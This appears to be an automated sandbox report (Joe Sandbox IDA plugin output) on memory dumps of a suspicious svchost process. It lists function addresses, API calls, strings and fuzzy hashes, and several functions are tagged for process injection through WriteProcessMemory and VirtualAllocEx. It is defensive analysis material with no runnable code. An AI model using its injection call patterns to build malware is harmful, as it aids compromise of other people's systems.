Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: CleanupStartupfreeaddrinfogethostname
String ID:
API String ID: 252301257-0
Opcode ID: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
Instruction ID: 01925c6db1f8f3f86d9a40cb054dce826a2e1fef095a07c98b455f9550f0be45
Opcode Fuzzy Hash: 1c7de7a7b739ff876f72758fab879ef31b66a72eb6dc2b419f8a8539415d4b0c
Instruction Fuzzy Hash: D13132F12047C592FA72CB36B448BF963A3F38D7D0F544226AB95676E5CB38C895C610

Function 0000000140010C46 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140010D20
SysFreeString.OLEAUT32 ref: 0000000140010D2E
SysFreeString.OLEAUT32 ref: 0000000140010D63
SysFreeString.OLEAUT32 ref: 0000000140010D6D
HeapFree.KERNEL32 ref: 0000000140010D90

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
Instruction ID: c7057bfe3fe1e259c7d9473786c2c13687bc0f68ae7fd6a9205dd21598a37846
Opcode Fuzzy Hash: 33a2060611cb8ec44a2f8ebbf3682c4b7cf822d20eecf976d1becbd4f745dd5e
Instruction Fuzzy Hash: 25218E36301A5082EE53DB67E8503AA6360FB8DFD9F144161EF8A4B774DE7AC849C700

Function 0000000140010B96 Relevance: 7.6, APIs: 5, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140010D20
SysFreeString.OLEAUT32 ref: 0000000140010D2E
SysFreeString.OLEAUT32 ref: 0000000140010D63
SysFreeString.OLEAUT32 ref: 0000000140010D6D
HeapFree.KERNEL32 ref: 0000000140010D90

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$Heap
String ID:
API String ID: 4134718113-0
Opcode ID: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
Instruction ID: 44dffc1b1623a4eb4a0fa9f924ccce8fcb8cef9b766d2aa3702618fef56f5325
Opcode Fuzzy Hash: fccf0d1d76b4618596f9da56fba9d61feb00287a7068e73cca5b6a5a2edeb918
Instruction Fuzzy Hash: A521503630165482EE53DB67E5903AA6360FB8DFD9F044565AF8A4B774DF7AC845C300

Function 00000001400167E0 Relevance: 7.6, APIs: 5, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400162A0: GetFullPathNameW.KERNEL32 ref: 0000000140016398

_time64.MSVCRT ref: 0000000140016829

Part of subcall function 0000000140015C30: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015C5B
Part of subcall function 0000000140015C30: HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CA0
Part of subcall function 0000000140015C30: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,00000000,00000001400152AB), ref: 0000000140015CBA

Part of subcall function 000000014000EF60: SysFreeString.OLEAUT32 ref: 000000014000EF92
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFB0
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000EFCB
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F019
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F049
Part of subcall function 000000014000EF60: HeapFree.KERNEL32(?,?,?,?,0000000140014F15,?,?,?,?,0000000140007877), ref: 000000014000F067

??3@YAXPEAX@Z.MSVCRT ref: 000000014001685F

Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015D5C
Part of subcall function 0000000140015CF0: HeapFree.KERNEL32 ref: 0000000140015DC9

_time64.MSVCRT ref: 000000014001687A
??3@YAXPEAX@Z.MSVCRT ref: 00000001400168A5
HeapFree.KERNEL32 ref: 00000001400168BF

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$Heap$??3@$_time64$??2@FullNamePathString
String ID:
API String ID: 150110825-0
Opcode ID: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
Instruction ID: 3471c3c0471e6186058520ccdacb3bb8f8d6888c7ecbf9f9485eb0a86c61140c
Opcode Fuzzy Hash: b374972345a98aab7f111945121116fe8a8daca0d979d4b2eb55e00bc1de3434
Instruction Fuzzy Hash: F4216F31215B8582FE56EB63A8143EA63A0EB8DBC0F440125FF4E0B7B9DF3DC8018240

Function 0000000140013800 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144memoryinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

WriteProcessMemory.KERNEL32 ref: 000000014001392E
VirtualFreeEx.KERNEL32 ref: 0000000140013A4C
HeapFree.KERNEL32 ref: 0000000140013A62

Strings

@, xrefs: 00000001400138EE

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$AddressHeapLibraryLoadMemoryProcProcessVirtualWrite
String ID: @
API String ID: 3124392466-2766056989
Opcode ID: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
Instruction ID: b2a891423e6191926618ad547ba0af25c79efd8fa3015ad4a40756f249b59b8a
Opcode Fuzzy Hash: 1bb38f2ae01ba480db47f1e073e612a7f6dc02e3a34142393fbfcebefcc833bd
Instruction Fuzzy Hash: 3B612A32205BC585EB618F12E8507DAA3A4F788BD8F444026EFCD5BB69DF39C555CB00

Function 000000014000A3D0 Relevance: 6.6, APIs: 5, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000A567
HeapFree.KERNEL32 ref: 000000014000A42F

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

HeapFree.KERNEL32 ref: 000000014000A6BE

Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E612
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E63D
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E668
Part of subcall function 000000014000E580: GetProcessHeap.KERNEL32 ref: 000000014000E67E
Part of subcall function 000000014000E580: RtlReAllocateHeap.NTDLL ref: 000000014000E69E

rand.MSVCRT ref: 000000014000A7E4
HeapFree.KERNEL32 ref: 000000014000A8D8

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AddressFreeProc$AllocateLibraryLoadProcessrand
String ID:
API String ID: 452208254-0
Opcode ID: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
Instruction ID: 44fc61901c645cc289ec697281c9d597236c5fc786e5eaf41bf353a4e8eb591f
Opcode Fuzzy Hash: bbab7dc8366791eaa36c59e80af165eb74e431883ef1af783511793844c69256
Instruction Fuzzy Hash: E2D161B2211B8585EB62DF26E8503EA37E4F749BC8F448015EF894B7A9DF39C945C740

Function 000000014000B180 Relevance: 6.4, APIs: 5, Instructions: 148memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000001400086EA), ref: 000000014000B2CD
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000001400086EA), ref: 000000014000B2F8
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00000001400086EA), ref: 000000014000B328

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
Instruction ID: 958cc02974dd490962601f4e5d7328da3ab7c70f1c6129f948b010f177f26f79
Opcode Fuzzy Hash: a22180b871657469462245d63a1df6603a5014c87e756b3b7c6317501a45b5d8
Instruction Fuzzy Hash: 46519CB2201B8482EA62DF57B9447DA63A1F78CBD4F584129EF8D47BA5DF38C8458740

Function 000000014000AD90 Relevance: 6.4, APIs: 5, Instructions: 143memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AEF5
HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,0000000140007F7E), ref: 000000014000AF25

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
Instruction ID: d4d1870c5087a67c0966be97a260029823248e973845292b3bb07a60e1b23ddb
Opcode Fuzzy Hash: 408a02f4f63ab91fc5187f14d3dcb37b4e722448c365077d34190373d3d5f0ce
Instruction Fuzzy Hash: 7D517CB2201B8586EA52DB56F8403DA63E5F789BD4F448015AF8E47B69CF3CC846C740

Function 0000000140001C20 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 197memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

memset.MSVCRT ref: 0000000140001DDF
HeapFree.KERNEL32 ref: 0000000140001F1E
HeapFree.KERNEL32 ref: 0000000140001F38

Strings

0, xrefs: 0000000140001DCF

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeapmemset
String ID: 0
API String ID: 2097932597-4108050209
Opcode ID: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
Instruction ID: 5a9c4f64bc53c3310fbde631ad91d9e498651b06d97f63ba4cdee06702fb0fd3
Opcode Fuzzy Hash: d608044e64b780387b2c7aa90c8eb0b27a45091dae120e6ad878195193090760
Instruction Fuzzy Hash: 4C910CB2310A8586EB61CF26E8543ED67A0FB88FC9F549026EB4D47B68DF39C549C740

Function 0000000140014540 Relevance: 6.1, APIs: 4, Instructions: 121libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

Part of subcall function 000000014000E0C0: memcpy.MSVCRT ref: 000000014000E285

GetProcAddress.KERNEL32 ref: 00000001400145B6
GetProcAddress.KERNEL32 ref: 00000001400145DC
GetProcAddress.KERNEL32 ref: 0000000140014602
GetProcAddress.KERNEL32 ref: 0000000140014628

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$memcpymemset
String ID:
API String ID: 2623457122-0
Opcode ID: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
Instruction ID: 70dbe746bec5ee3447c0d7f353d4dfd784e5f219e21c1097a21de84af56b6886
Opcode Fuzzy Hash: 80d22dda9c92a7dc3ff39ece2696b542829985d415a44d4f58619847b4434d21
Instruction Fuzzy Hash: C9514736311B4182EB52DB16E8903EA23A1F78CBD4F44422AEB9D477B4DF39C449C740

Function 00000001400164D0 Relevance: 6.1, APIs: 4, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

??2@YAPEAX_K@Z.MSVCRT ref: 00000001400165A5
??3@YAXPEAX@Z.MSVCRT ref: 0000000140016609
HeapFree.KERNEL32 ref: 000000014001665A
HeapFree.KERNEL32 ref: 0000000140016673

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$??2@??3@memset
String ID:
API String ID: 987703202-0
Opcode ID: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
Instruction ID: 56bfb0d7c4714fc23e3e49edf08900e61e95882cce72991227d767f54d68e605
Opcode Fuzzy Hash: 4066fb4ad796096cb4f0aa9e0f7ccb1a1a05eebd38f039e7280e541ce6032752
Instruction Fuzzy Hash: F5419772201B8581EB729F27B8103EB63A5FB8DBC4F444125EF495B7AAEE39C845C740

Function 00000001400130C0 Relevance: 6.1, APIs: 4, Instructions: 110librarymemoryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

GetProcAddress.KERNEL32 ref: 0000000140013166
MultiByteToWideChar.KERNEL32 ref: 000000014001319C
MultiByteToWideChar.KERNEL32 ref: 00000001400131E0
HeapFree.KERNEL32 ref: 000000014001326E

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AddressFreeHeapProcmemset
String ID:
API String ID: 1855896800-0
Opcode ID: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
Instruction ID: e3fb2f7e366e748dc6d962b2961083894d0ca4f4d749cc2a9cf1ff3c065c6bc7
Opcode Fuzzy Hash: 2b06c8bbf3553aec2115b7400860299f7851679e21e5d390be81bfaf3dcb26c1
Instruction Fuzzy Hash: 37414B72204BC185EA61DB16A8507DB63A0F78DBC5F444129EF9D4BBAADF39C505CB00

Function 000000014000A230 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000000014000A262

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000000014000A3A0
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000000014000A3B5

Strings

%02X, xrefs: 000000014000A349

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$AddressLibraryLoadProc
String ID: %02X
API String ID: 2772560535-436463671
Opcode ID: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
Instruction ID: e87dbf364566d0340ffc93f2b35573667175a0268ae96110bc771c99fe9a3d48
Opcode Fuzzy Hash: 54760e3ea149fe77b89ba2b72778ff7ec6480fe297307d0b5ce2e4d3fbdbd36a
Instruction Fuzzy Hash: 64413A72204B8583EB52DB26F4407DAA7E5F7897C4F048125FB8A47BA5EF38D846CB40

Function 0000000140004120 Relevance: 6.1, APIs: 4, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

??2@YAPEAX_K@Z.MSVCRT ref: 00000001400041E4
_time64.MSVCRT ref: 000000014000422A
HeapFree.KERNEL32 ref: 000000014000428C

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??2@FreeHeap_time64memset
String ID:
API String ID: 665068314-0
Opcode ID: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
Instruction ID: 3b41cf12a1854ee51030ad2dfde3dce9ab56220ab60abe65fc2278721d7e4742
Opcode Fuzzy Hash: 8b74649592698774aa04cc3df794b495fdbb369b225488a8c13f1aa0cbf406a8
Instruction Fuzzy Hash: 4C4117B6205B8582EB66CF52B4103EA63A4FB88BC0F594126BB89477A6DF38C841C744

Function 000000014000C750 Relevance: 6.1, APIs: 4, Instructions: 92librarymemoryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryW.KERNEL32 ref: 000000014000C7D3
GetProcAddress.KERNEL32 ref: 000000014000C806
GetLastError.KERNEL32 ref: 000000014000C846
HeapFree.KERNEL32 ref: 000000014000C899

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressErrorFreeHeapLastLibraryLoadProcmemset
String ID:
API String ID: 3226096620-0
Opcode ID: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
Instruction ID: 4ed53ce331cc876d90759824a61a266281903749b9815567c4f8bf6b8516744d
Opcode Fuzzy Hash: d1715fdb5dddd0d251813e7f8691ff23fd2f0f614da14f1e4099650b5e5ebb2c
Instruction Fuzzy Hash: FE314BB1205AC184EA62DF13B8407EB63A0BB8DBC5F444025EF8D577A6EE39C445CB40

Function 000000014000A8F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,00000000,0000000140007AF5,?,?,?,000000014000562A), ref: 000000014000A916
rand.MSVCRT ref: 000000014000A923
rand.MSVCRT ref: 000000014000A980

Strings

yxxx, xrefs: 000000014000A92B

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: rand$FreeHeap
String ID: yxxx
API String ID: 3257490382-3567846162
Opcode ID: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
Instruction ID: 68e9f63343866e12a90d5f998d2b8139de06248d58b94c3f77e5065cd01b016c
Opcode Fuzzy Hash: 1ed65ebdc0ce8e4ce5d2a64fe317f14d270a0097822f3f55ffc6e5b95df04c10
Instruction Fuzzy Hash: 9C21E7B2710A4086D756DB17B8103DA66E5F78E7D4F4A9115FF4A0B769EF3CC8808340

Function 0000000140001FA0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32 ref: 0000000140001FE4
SysFreeString.OLEAUT32 ref: 0000000140001FF3
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001FFC
HeapFree.KERNEL32 ref: 0000000140002030

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Free$String$??3@Heap
String ID:
API String ID: 4235498366-0
Opcode ID: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
Instruction ID: f05e54370569ffaa4172b8e709ae349b72a04d2577a779893dc1ca082f76694d
Opcode Fuzzy Hash: c12198bd40917f41d5f87fff9c6930f7040eddc6234b709b1659fba2cdf50f37
Instruction Fuzzy Hash: 36110376204B8086EB56DF52E9903A9B3B4F788FC4F185116EF8A07B69CF39C891C741

Function 0000000140011FE0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 220memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0000000140012116

Part of subcall function 0000000140013B50: WriteProcessMemory.KERNEL32 ref: 0000000140013BB8

HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 000000014001238C

Part of subcall function 0000000140013B00: ReadProcessMemory.KERNEL32 ref: 0000000140013B25

Strings

@, xrefs: 000000014001210E

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd
